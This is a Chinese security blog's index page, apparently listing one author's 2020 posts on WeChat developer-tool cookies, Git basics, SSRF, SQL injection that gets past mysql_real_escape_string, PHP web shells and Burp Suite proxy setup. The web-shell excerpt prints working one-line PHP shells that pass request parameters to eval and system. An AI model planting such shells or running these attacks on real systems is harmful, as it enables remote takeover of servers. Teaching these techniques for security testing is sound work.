摘要:
目录方式一 替换微信开发者工具的cookie方式二 给系统默认浏览器设置代理 文章比较久远了,方法失效了。当个留念吧。 做微信公众号开发或者测试的朋友一般都会下载官方的微信开发者工具,来帮助自己开发或者测试。 微信开发者工具下载地址:https://developers.weixin.qq.com/ 阅读全文
posted @ 2020-03-26 23:45
Mysticbinary
阅读(3737)
评论(0)
推荐(1)
摘要:
目录基础背景知识分支Git的三个空间的认识信息、状态查询Git 全局设置常用命令免密登录SSH of Pulic Key Login Github Git可以类比为一个文件管理工具,它可以记录文件夹中每个文件每次编辑记录。 基础背景知识 分支 分支可以先理解为拷贝出一个新文件夹,并切换去操作这个新文 阅读全文
posted @ 2020-03-26 22:59
Mysticbinary
阅读(361)
评论(0)
推荐(0)
摘要:
什么是SSRF 一个对外的Web接口,改接口能让用户控制curl命令,去访问别的web服务。 简图如下 想象一下当用户请求的baidu.com/x.php?image=google.com/1.jpg 改成 baidu.com/x.php?image=private.com/php.info,是不是 阅读全文
posted @ 2020-03-26 22:51
Mysticbinary
阅读(738)
评论(0)
推荐(0)
摘要:
类似PHP语言的 mysql_real_escape_string() 的函数,在用来防范SQL注入的时候,可能会遇到int型注入成功的情况。 mysql_real_escape_string()用法 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊 阅读全文
posted @ 2020-03-26 22:46
Mysticbinary
阅读(1024)
评论(0)
推荐(0)
摘要:
基础类 很容易被扫描、检测出来 <?php @eval($_GET['phpcode']);?> <?php @eval($_POST['phpcode']);?> <?php @system($_GET['cmd']);?> <?php @system($_POST['cmd']);?> <?ph 阅读全文
posted @ 2020-03-26 22:41
Mysticbinary
阅读(470)
评论(0)
推荐(0)
摘要:
目录下载证书mac OS导入证书Chrome设置代理Safari设置代理 下面的操作基于Mac OS Catalina(v10.15.3),抓包拦截工具基于Burp Suite v2.1.05。 下载证书 将Burp Suite 的证书下载到本地任意一个路径下。如果使用其它抓包工具,自行搜索一下。 阅读全文
posted @ 2020-03-26 21:53
Mysticbinary
阅读(5027)
评论(0)
推荐(2)
浙公网安备 33010602011771号